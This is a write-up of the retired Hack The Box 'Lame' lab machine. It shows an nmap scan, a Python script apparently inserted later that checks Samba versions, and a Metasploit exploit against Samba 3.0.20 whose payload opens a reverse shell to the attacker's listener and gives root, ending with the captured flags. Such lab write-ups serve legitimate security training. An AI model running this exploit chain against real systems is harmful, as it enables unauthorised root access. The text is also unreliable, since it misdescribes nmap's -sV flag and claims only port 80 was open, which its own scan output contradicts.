HTB – Lame {retired}

With nmap we scan the open ports and services; the syntax is sudo nmap -sV -sT -O -A -p- <IP ADDRESS> where:
-sV indicates an SCTP INIT scan,
-sT indicates a TCP connect scan,
-O indicates Operating System detection,
-A indicates an "aggressive" scan,
-p- indicates scanning all ports.

The nmap scan reveals the following ports open:
80 – http.

ali@kali:~$ sudo nmap -sV -sT -O -A -p- 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-11 10:24 CEST
Nmap scan report for 10.10.10.3
Host is up (0.037s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

A check on Exploit Database shows that Samba smbd 3.0.20 is vulnerable to Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution (Metasploit).
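The version check above can be automated from the scan output: the following is an added example (not part of the original writeup) that parses the nmap -sV port lines shown earlier and flags any Samba banner whose version falls in the 3.0.20 <= v < 3.0.25rc3 range named on Exploit Database. The sample input is the scan output from this page, embedded so the script runs offline; the regexes and function names are this example's own assumptions.

```python
import re

# Port lines from the nmap -sV scan above (constructed sample input, embedded to run offline)
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap_ports(text):
    """Turn nmap -sV text output into dicts: port, proto, state, service, version."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return rows

def version_key(v):
    """Sortable key for Samba-style versions such as '3.0.25rc3' or '3.0.20-Debian'.
    A release candidate sorts before the final release of the same number."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", v)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    # rc present -> (0, n); final release -> (1, 0), so 3.0.25rc3 < 3.0.25
    return (int(major), int(minor), int(patch), (0, int(rc)) if rc else (1, 0))

def samba_usermap_affected(version_str):
    """True when an exact Samba version is reported and lies in 3.0.20 <= v < 3.0.25rc3."""
    m = re.search(r"Samba smbd (\d+\.\d+\.\d+(?:rc\d+)?)", version_str)
    if not m:
        return False  # a generic banner like '3.X - 4.X' gives no exact version
    key = version_key(m.group(1))
    return version_key("3.0.20") <= key < version_key("3.0.25rc3")

def affected_ports(text):
    """Ports whose service banner matches the affected Samba range."""
    return [r["port"] for r in parse_nmap_ports(text) if samba_usermap_affected(r["version"])]
```

Only port 445 is flagged: the 139 banner reports a version range rather than an exact release, which is why the exact banner on 445 is what confirms the finding.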

We open Metasploit, search for and select the exploit.

msf5 exploit(multi/samba/usermap_script) > search "samba 3.0.20"

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------

   14  exploit/multi/samba/usermap_script                     2007-05-14       excellent  No     Samba "username map script" Command Execution

msf5 exploit(multi/samba/usermap_script) > use 14
msf5 exploit(multi/samba/usermap_script) > 

We display the options and set the RHOSTS parameter to the IP of the target machine, i.e. 10.10.10.3.

msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > 

We run the exploit and obtain a shell as root.

msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.3:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo O8hurGcOL7IXmtbj;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "O8hurGcOL7IXmtbj\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (10.10.14.3:4444 -> 10.10.10.3:49765) at 2020-06-11 10:48:43 +0200

whoami
root

We navigate to the users' directory for the first flag:
69454a937d94f5f0225ea00acd2e84c5

cd /home 
ls
ftp
makis
service
user
cd makis
ls
user.txt
cat user.txt
69454a937d94f5f0225ea00acd2e84c5

We navigate to the root directory for the second and last flag:

cd /root
ls 
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
92caac3be140ef409e45721348a4e9df

From the Hack The Box console we can see that we have successfully submitted the key for “user” access and the key for “root” access.
